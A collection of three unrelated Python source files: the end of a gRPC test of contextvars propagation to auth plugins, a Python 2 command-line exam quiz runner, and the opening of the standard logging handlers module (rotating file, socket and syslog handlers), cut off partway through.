) != _EXPECTED_VALUE and not test_common.running_under_gevent():
# contextvars do not work under gevent, but the rest of this
# test is still valuable as a test of concurrent runs of the
# metadata credentials code path.
raise AssertionError("{} != {}".format(test_var.get(),
_EXPECTED_VALUE))
callback((), None)
def assert_called(self, test):
test.assertTrue(self._invoked)
test.assertEqual(_EXPECTED_VALUE, self._recorded_value)
else:
def set_up_expected_context():
pass
class TestCallCredentials(grpc.AuthMetadataPlugin):
def __call__(self, context, callback):
callback((), None)
# TODO(https://github.com/grpc/grpc/issues/22257)
@unittest.skipIf(os.name == "nt", "LocalCredentials not supported on Windows.")
class ContextVarsPropagationTest(unittest.TestCase):
def test_propagation_to_auth_plugin(self):
set_up_expected_context()
with _server() as port:
target = "localhost:{}".format(port)
local_credentials = grpc.local_channel_credentials()
test_call_credentials = TestCallCredentials()
call_credentials = grpc.metadata_call_credentials(
test_call_credentials, "test call credentials")
composite_credentials = grpc.composite_channel_credentials(
local_credentials, call_credentials)
with grpc.secure_channel(target, composite_credentials) as channel:
stub = channel.unary_unary(_UNARY_UNARY)
response = stub(_REQUEST, wait_for_ready=True)
self.assertEqual(_REQUEST, response)
def test_concurrent_propagation(self):
_THREAD_COUNT = 32
_RPC_COUNT = 32
set_up_expected_context()
with _server() as port:
target = "localhost:{}".format(port)
local_credentials = grpc.local_channel_credentials()
test_call_credentials = TestCallCredentials()
call_credentials = grpc.metadata_call_credentials(
test_call_credentials, "test call credentials")
composite_credentials = grpc.composite_channel_credentials(
local_credentials, call_credentials)
wait_group = test_common.WaitGroup(_THREAD_COUNT)
def _run_on_thread(exception_queue):
try:
with grpc.secure_channel(target,
composite_credentials) as channel:
stub = channel.unary_unary(_UNARY_UNARY)
wait_group.done()
wait_group.wait()
for i in range(_RPC_COUNT):
response = stub(_REQUEST, wait_for_ready=True)
self.assertEqual(_REQUEST, response)
except Exception as e: # pylint: disable=broad-except
exception_queue.put(e)
threads = []
for _ in range(_THREAD_COUNT):
q = queue.Queue()
thread = threading.Thread(target=_run_on_thread, args=(q,))
thread.setDaemon(True)
thread.start()
threads.append((thread, q))
for thread, q in threads:
thread.join()
if not q.empty():
raise q.get()
if __name__ == '__main__':
logging.basicConfig()
unittest.main(verbosity=2)
|
main.py
|
import json, argparse, sys, random, os, re
from threading import Thread
from time import sleep
from collections import Iterator
# See example.json for example
class Exam(Iterator):
def __init__(self, file_name= None, shuffle=False, shuffle_answers=False, limit=-1, test_mode=False, **kwargs):
self.count_questions = None
if kwargs:
self.count_questions = kwargs['count_questions']
self.file_name = file_name
self.exam = self.load_test()
self.questions = [x for x in self.exam['questions'] if (not kwargs['chapter'] or x.get('chapter', None)==kwargs['chapter']) and (not kwargs['category'] or x.get('category', None)==kwargs['category'])]
if shuffle: random.shuffle(self.questions)
self.shuffle_answers = shuffle_answers
self.limit = limit
if self.limit == -1: self.limit = len(self.questions)
self.test_mode = test_mode
self.correct = 0
self.i = -1
def load_test(self):
exam_data = None
with open(self.file_name) as f:
exam_data = f.readlines()
exam_data = ''.join(map(str,exam_data))
if json is not None:
exam_data = json.loads(exam_data)
return exam_data
def __iter__(self):
return self
def next(self):
if self.i < len(self.questions) - 1 and (self.limit <= 0 or self.i < self.limit - 1):
self.i += 1
return self.questions[self.i]
else:
raise StopIteration
def countdown():
for i in range(60):
sys.stdout.write("Timer: %d\r" % (i))
sys.stdout.flush()
sleep(1)
def main(exam):
input = None
current_question=0
incorrect_questions=[]
question_count=min(len(exam.questions), exam.limit)
if not exam.count_questions:
for i, question in enumerate(exam):
current_question+=1
print "Question(%s of %s): %s" % (current_question, question_count, question['question'])
answer_keys = question['answer_bank'].keys()
answers = map(str, question['answers'])
required_correct_answers = len(answers)
correct_answers = 0
#print required_correct_answers
# Shuffle if enabled, else sort by key
if exam.shuffle_answers: random.shuffle(answer_keys)
else: answer_keys = sorted(answer_keys)
print ""
for k in answer_keys:
print k + ': ' + question['answer_bank'][k]
while True:
did_not_know_answer = False
print ""
input = raw_input("Your answer [" + str(required_correct_answers) + "]: ").strip().upper()
if len(input):
if "P" in input:
print "Passed."
break
if "X" in input and not exam.test_mode:
print answers
print ""
print "Explanation: %s" % question['explanation']
break
# Sort then uniquefy the input
if sorted(input) == sorted(answers):
if exam.test_mode:
exam.correct += 1
else:
print "Correct!"
if len(question['explanation']):
print "Explanation: %s" % question['explanation']
break
else:
if not exam.test_mode:
print "Try again!"
else:
incorrect_questions.append(question)
break
else:
print "An answer must be provided."
continue
print ""
print raw_input("Next?")
os.system('clear')
if exam.test_mode:
print "Test score: %s / %s" % (exam.correct, exam.limit)
while True:
show_incorrect = raw_input("Do you wish to view the questions that were answered incorrectly (y/n)? ").lower()
if show_incorrect == "n": break
elif show_incorrect == "y":
for j, inc_question in enumerate(incorrect_questions):
print "Question %s: %s" % (j, inc_question['question'])
print ""
answer_keys = inc_question['answer_bank'].keys()
for k in sorted(answer_keys):
print k + ': ' + inc_question['answer_bank'][k]
print ""
print "Answer(s): %s" % (map(str,inc_question['answers']))
print ""
print "Explanation: %s" % inc_question['explanation']
raw_input("Next?")
os.system('clear')
break
else:
os.system('clear')
print "Total questions in exam: %s" % len(exam.questions)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--file', default=None)
parser.add_argument('-c', '--chapter', default=None)
parser.add_argument('-g', '--category', default=None)
parser.add_argument('-r', '--random_questions', default=False, action='store_true')
parser.add_argument('-s', '--shuffle_answers', default=False, action='store_true')
parser.add_argument('-t', '--test_mode', default=False, action='store_true')
parser.add_argument('-l', '--question_limit', type=int, default=-1)
parser.add_argument('--count_questions', default=False, action='store_true')
pargs = parser.parse_args()
if pargs.file:
os.system('clear')
# Temp is going to change; chapter may be substitued with category
temp={'chapter':pargs.chapter, 'category': pargs.category}
exam=Exam(file_name=pargs.file, shuffle=pargs.random_questions, shuffle_answers=pargs.shuffle_answers, limit=pargs.question_limit, test_mode=pargs.test_mode, count_questions=pargs.count_questions, **temp)
#t1=Thread(target=countdown)
t2=Thread(target=main, args=(exam,))
#t1.start()
t2.start()
else:
print "Exam file name must be provided."
sys.exit(1)
|
handlers.py
|
# Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
import threading
import copy
#
# Some constants...
#
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514
_MIDNIGHT = 24 * 60 * 60 # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
"""
Base class for handlers that rotate log files at a certain point.
Not meant to be instantiated directly. Instead, use RotatingFileHandler
or TimedRotatingFileHandler.
"""
def __init__(self, filename, mode, encoding=None, delay=False):
"""
Use the specified filename for streamed logging
"""
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.mode = mode
self.encoding = encoding
self.namer = None
self.rotator = None
def emit(self, record):
"""
Emit a record.
Output the record to the file, catering for rollover as described
in doRollover().
"""
try:
if self.shouldRollover(record):
self.doRollover()
logging.FileHandler.emit(self, record)
except Exception:
self.handleError(record)
def rotation_filename(self, default_name):
"""
Modify the filename of a log file when rotating.
This is provided so that a custom filename can be provided.
The default implementation calls the 'namer' attribute of the
handler, if it's callable, passing the default name to
it. If the attribute isn't callable (the default is None), the name
is returned unchanged.
:param default_name: The default name for the log file.
"""
if not callable(self.namer):
result = default_name
else:
result = self.namer(default_name)
return result
def rotate(self, source, dest):
"""
When rotating, rotate the current log.
The default implementation calls the 'rotator' attribute of the
handler, if it's callable, passing the source and dest arguments to
it. If the attribute isn't callable (the default is None), the source
is simply renamed to the destination.
:param source: The source filename. This is normally the base
filename, e.g. 'test.log'
:param dest: The destination filename. This is normally
what the source is rotated to, e.g. 'test.log.1'.
"""
if not callable(self.rotator):
# Issue 18940: A file may not have been created if delay is True.
if os.path.exists(source):
os.rename(source, dest)
else:
self.rotator(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a set of files, which switches from one file
to the next when the current file reaches a certain size.
"""
def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
"""
Open the specified file and use it as the stream for logging.
By default, the file grows indefinitely. You can specify particular
values of maxBytes and backupCount to allow the file to rollover at
a predetermined size.
Rollover occurs whenever the current log file is nearly maxBytes in
length. If backupCount is >= 1, the system will successively create
new files with the same pathname as the base file, but with extensions
".1", ".2" etc. appended to it. For example, with a backupCount of 5
and a base file name of "app.log", you would get "app.log",
"app.log.1", "app.log.2", ... through to "app.log.5". The file being
written to is always "app.log" - when it gets filled up, it is closed
and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
exist, then they are renamed to "app.log.2", "app.log.3" etc.
respectively.
If maxBytes is zero, rollover never occurs.
"""
# If rotation/rollover is wanted, it doesn't make sense to use another
# mode. If for example 'w' were specified, then if there were multiple
# runs of the calling application, the logs from previous runs would be
# lost if the 'w' is respected, because the log file would be truncated
# on each run.
if maxBytes > 0:
mode = 'a'
BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
self.maxBytes = maxBytes
self.backupCount = backupCount
def doRollover(self):
"""
Do a rollover, as described in __init__().
"""
if self.stream:
self.stream.close()
self.stream = None
if self.backupCount > 0:
for i in range(self.backupCount - 1, 0, -1):
sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
i + 1))
if os.path.exists(sfn):
if os.path.exists(dfn):
os.remove(dfn)
os.rename(sfn, dfn)
dfn = self.rotation_filename(self.baseFilename + ".1")
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if not self.delay:
self.stream = self._open()
def shouldRollover(self, record):
"""
Determine if rollover should occur.
Basically, see if the supplied record would cause the file to exceed
the size limit we have.
"""
if self.stream is None: # delay was set...
self.stream = self._open()
if self.maxBytes > 0: # are we rolling over?
msg = "%s\n" % self.format(record)
self.stream.seek(0, 2) #due to non-posix-compliant Windows feature
if self.stream.tell() + len(msg) >= self.maxBytes:
return 1
return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the log file at certain timed
intervals.
If backupCount is > 0, when rollover is done, no more than backupCount
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.when = when.upper()
self.backupCount = backupCount
self.utc = utc
self.atTime = atTime
# Calculate the real rollover interval, which is just the number of
# seconds between rollovers. Also set the filename suffix used when
# a rollover occurs. Current 'when' events supported:
# S - Seconds
# M - Minutes
# H - Hours
# D - Days
# midnight - roll over at midnight
# W{0-6} - roll over on a certain day; 0 - Monday
#
# Case of the 'when' specifier is not important; lower or upper case
# will work.
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
self.dayOfWeek = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
else:
raise ValueError("Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch, re.ASCII)
self.interval = self.interval * interval # multiply by units requested
# The following line added because the filename passed in could be a
# path object (see Issue #27493), but self.baseFilename will be a string
filename = self.baseFilename
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rolloverAt = self.computeRollover(t)
def computeRollover(self, currentTime):
"""
Work out the rollover time based on the specified time.
"""
result = currentTime + self.interval
# If we are rolling over at midnight or weekly, then the interval is already known.
# What we need to figure out is WHEN the next interval is. In other words,
# if you are rolling over at midnight, then your base interval is 1 day,
# but you want to start that one day clock at midnight, not now. So, we
# have to fudge the rolloverAt value in order to trigger the first rollover
# at the right time. After that, the regular interval will take care of
# the rest. Note that this code doesn't care about leap seconds. :)
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(currentTime)
else:
t = time.localtime(currentTime)
currentHour = t[3]
currentMinute = t[4]
currentSecond = t[5]
currentDay = t[6]
# r is the number of seconds left between now and the next rotation
if self.atTime is None:
rotate_ts = _MIDNIGHT
else:
rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
self.atTime.second)
r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
currentSecond)
if r < 0:
# Rotate time is before the current time (for example when
# self.rotateAt is 13:45 and it now 14:15), rotation is
# tomorrow.
r += _MIDNIGHT
currentDay = (currentDay + 1) % 7
result = currentTime + r
# If we are rolling over on a certain day, add in the number of days until
# the next rollover, but offset by 1 since we just calculated the time
# until the next day starts. There are three cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e., today is
# day 2 (Wednesday) and rollover is on day 6 (Sunday). Days to
# next rollover is simply 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e., today
# is day 5 (Saturday) and rollover is on day 3 (Thursday).
# Days to rollover is 6 - 5 + 3, or 4. In this case, it's the
# number of days left in the current week (1) plus the number
# of days in the next week until the rollover day (3).
# The calculations described in 2) and 3) above need to have a day added.
# This is because the above time calculation takes us to midnight on this
# day, i.e. the start of the next day.
if self.when.startswith('W'):
day = currentDay # 0 is Monday
if day != self.dayOfWeek:
if day < self.dayOfWeek:
daysToWait = self.dayOfWeek - day
else:
daysToWait = 6 - day + self.dayOfWeek + 1
newRolloverAt = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dstNow = t[-1]
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
result = newRolloverAt
return result
def shouldRollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
t = int(time.time())
if t >= self.rolloverAt:
return 1
return 0
def getFilesToDelete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dirName, baseName = os.path.split(self.baseFilename)
fileNames = os.listdir(dirName)
result = []
prefix = baseName + "."
plen = len(prefix)
for fileName in fileNames:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dirName, fileName))
if len(result) < self.backupCount:
result = []
else:
result.sort()
result = result[:len(result) - self.backupCount]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the filename
when the rollover happens. However, you want the file to be named for the
start of the interval, not the current time. If there is a backup count,
then we have to get a list of matching filenames, sort them and remove
the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
currentTime = int(time.time())
dstNow = time.localtime(currentTime)[-1]
t = self.rolloverAt - self.interval
if self.utc:
timeTuple = time.gmtime(t)
else:
timeTuple = time.localtime(t)
dstThen = timeTuple[-1]
if dstNow != dstThen:
if dstNow:
addend = 3600
else:
addend = -3600
timeTuple = time.localtime(t + addend)
dfn = self.rotation_filename(self.baseFilename + "." +
time.strftime(self.suffix, timeTuple))
if os.path.exists(dfn):
os.remove(dfn)
self.rotate(self.baseFilename, dfn)
if self.backupCount > 0:
for s in self.getFilesToDelete():
os.remove(s)
if not self.delay:
self.stream = self._open()
newRolloverAt = self.computeRollover(currentTime)
while newRolloverAt <= currentTime:
newRolloverAt = newRolloverAt + self.interval
#If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith('W')) and not self.utc:
dstAtRollover = time.localtime(newRolloverAt)[-1]
if dstNow != dstAtRollover:
if not dstNow: # DST kicks in before next rollover, so we need to deduct an hour
addend = -3600
else: # DST bows out before next rollover, so we need to add an hour
addend = 3600
newRolloverAt += addend
self.rolloverAt = newRolloverAt
class WatchedFileHandler(logging.FileHandler):
"""
A handler for logging to a file, which watches the file
to see if it has changed while in use. This can happen because of
usage of programs such as newsyslog and logrotate which perform
log file rotation. This handler, intended for use under Unix,
watches the file to see if it has changed since the last emit.
(A file has changed if its device or inode have changed.)
If it has changed, the old file stream is closed, and the file
opened to get a new stream.
This handler is not appropriate for use under Windows, because
under Windows open files cannot be moved or renamed - logging
opens the files with exclusive locks - and so there is no need
for such a handler. Furthermore, ST_INO is not supported under
Windows; stat always returns zero for this value.
This handler is based on a suggestion and patch by Chad J.
Schroeder.
"""
def __init__(self, filename, mode='a', encoding=None, delay=False):
logging.FileHandler.__init__(self, filename, mode, encoding, delay)
self.dev, self.ino = -1, -1
self._statstream()
def _statstream(self):
if self.stream:
sres = os.fstat(self.stream.fileno())
self.dev, self.ino = sres[ST_DEV], sres[ST_INO]
def reopenIfNeeded(self):
"""
Reopen log file if needed.
Checks if the underlying file has changed, and if it
has, close the old stream and reopen the file to get the
current stream.
"""
# Reduce the chance of race conditions by stat'ing by path only
# once and then fstat'ing our new fd if we opened a new log stream.
# See issue #14632: Thanks to John Mulligan for the problem report
# and patch.
try:
# stat the file by path, checking for existence
sres = os.stat(self.baseFilename)
except FileNotFoundError:
sres = None
# compare file system stat with that of our stream file handle
if not sres or sres[ST_DEV] != self.dev or sres[ST_INO] != self.ino:
if self.stream is not None:
# we have an open file handle, clean it up
self.stream.flush()
self.stream.close()
self.stream = None # See Issue #21742: _open () might fail.
# open a new file handle and get new stat info from that fd
self.stream = self._open()
self._statstream()
def emit(self, record):
"""
Emit a record.
If underlying file has changed, reopen the file before emitting the
record to it.
"""
self.reopenIfNeeded()
logging.FileHandler.emit(self, record)
class SocketHandler(logging.Handler):
"""
A handler class which writes logging records, in pickle format, to
a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
When the attribute *closeOnError* is set to True - if a socket error
occurs, the socket is silently closed and then reopened on the next
logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
if port is None:
self.address = host
else:
self.address = (host, port)
self.sock = None
self.closeOnError = False
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
if self.port is not None:
result = socket.create_connection(self.address, timeout=timeout)
else:
result = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
result.settimeout(timeout)
try:
result.connect(self.address)
except OSError:
result.close() # Issue 19182
raise
return result
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = True
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except OSError:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
self.sock.sendall(s)
except OSError: #pragma: no cover
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
# just to get traceback text into record.exc_text ...
dummy = self.format(record)
# See issue #14436: If msg or args are objects, they may not be
# available on the receiving end. So we convert the msg % args
# to a string, save it as msg and zap the args.
d = dict(record.__dict__)
d['msg'] = record.getMessage()
d['args'] = None
d['exc_info'] = None
# Issue #25685: delete 'message' if present: redundant with 'msg'
d.pop('message', None)
s = pickle.dumps(d, 1)
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except Exception:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
sock = self.sock
if sock:
self.sock = None
sock.close()
logging.Handler.close(self)
finally:
self.release()
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = False
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
if self.port is None:
family = socket.AF_UNIX
else:
family = socket.AF_INET
s = socket.socket(family, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, self.address)
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=None):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used. If socktype is
specified as socket.SOCK_DGRAM or socket.SOCK_STREAM, that specific
socket type will be used. For Unix sockets, you can also specify a
socktype of None, in which case socket.SOCK_DGRAM will be used, falling
back to socket.SOCK_STREAM.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = True
# Syslog server may be unavailable during handler initialisation.
# C's openlog() function also ignores connection errors.
# Moreover, we ignore these errors while logging, so it not worse
# to ignore it also here.
try:
self._connect_unixsocket(address)
except OSError:
pass
else:
self.unixsocket = False
if socktype is None:
socktype = socket.SOCK_DGRAM
host, port = address
ress = socket.getaddrinfo(host, port, 0, socktype)
if not ress:
raise OSError("getaddrinfo returns an empty list")
for res in ress:
af, socktype, proto, _, sa = res
err = sock = None
try:
sock = socket.socket(af, socktype, proto)
if socktype == socket.SOCK_STREAM:
sock.connect(sa)
break
except OSError as exc:
err = exc
if sock is not None:
sock.close()
if err is not None:
raise err
self.socket = sock
self.socktype = socktype
def _connect_unixsocket(self, address):
use_socktype = self.socktype
if use_socktype is None:
use_socktype = socket.SOCK_DGRAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
if self.socktype is not None:
# user didn't specify falling back, so fail
raise
use_socktype = socket.SOCK_STREAM
self.socket = socket.socket(socket.AF_UNIX, use_socktype)
try:
self.socket.connect(address)
# it worked, so set self.socktype to the used type
self.socktype = use_socktype
except OSError:
self.socket.close()
raise
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close(self):
"""
Closes the socket.
"""
self.acquire()
try:
self.socket.close()
logging.Handler.close(self)
finally:
self.release()
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
ident = '' # prepended to all messages
append_nul = True # some old syslog daemons expect a NUL terminator
def emit(self, record):
"""
Emit a record.
